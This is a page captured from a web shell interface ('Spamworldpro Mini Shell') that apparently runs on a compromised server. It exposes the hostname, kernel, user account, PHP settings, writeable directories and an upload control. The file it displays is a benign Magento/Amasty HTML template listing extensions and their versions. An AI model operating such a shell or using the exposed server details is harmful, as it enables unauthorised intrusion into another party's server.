Spamworldpro Mini Shell
Spamworldpro


Server : Apache
System : Linux server2.corals.io 4.18.0-348.2.1.el8_5.x86_64 #1 SMP Mon Nov 15 09:17:08 EST 2021 x86_64
User : corals ( 1002)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/corals/old/vendor/amasty/base/view/adminhtml/web/template/extensions/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/corals/old/vendor/amasty/base/view/adminhtml/web/template/extensions/table.html
<table class="ambase-table-container">
    <thead class="ambase-thead">
    <tr class="ambase-tr">
        <th class="ambase-th" data-bind="i18n: 'Products'"></th>
        <th class="ambase-th" data-bind="i18n: 'Version'"></th>
        <th class="ambase-th" data-bind="i18n: 'Actions'"></th>
    </tr>
    </thead>
    <tbody class="ambase-tbody">
        <!-- ko foreach: $data.modules -->
            <tr class="ambase-tr">
                <td class="ambase-td">
                    <span data-bind="text: $data.name"></span>
                    <!-- ko if: $data.plan_label -->
                        <span class="ambase-plan" data-bind="text: $data.plan_label"></span>
                    <!-- /ko -->
                </td>
                <td class="ambase-td">
                    <!-- ko if: $data.has_update -->
                        <div class="ambase-version-container">
                            <span class="ambase-version -current" data-bind="text: $data.version"></span>
                            <span class="ambase-version -update" data-bind="text: $data.last_version"></span>
                        </div>
                        <a class="ambase-link"
                           target="_blank"
                           data-bind="i18n: 'New Update',
                                      attr: {href: $data.update_url,
                                      title: $('New Update')}"></a>
                    <!-- /ko -->
                    <!-- ko ifnot: $data.has_update -->
                        <span class="ambase-version -last" data-bind="text: $data.version"></span>
                    <!-- /ko -->
                </td>
                <td class="ambase-td">
                    <!-- ko if: $data.upgrade_url -->
                        <a class="ambase-link"
                           target="_blank"
                           data-bind="i18n: 'Upgrade Your Plan',
                                      attr: {href: $data.upgrade_url,
                                      title: $('Upgrade Your Plan')}"></a>
                    <!-- /ko -->
                    <!-- ko ifnot: $data.upgrade_url -->
                        <span data-bind="i18n: 'None'"></span>
                    <!-- /ko -->
                </td>
            </tr>
        <!-- /ko-->
    </tbody>
</table>

Spamworldpro Mini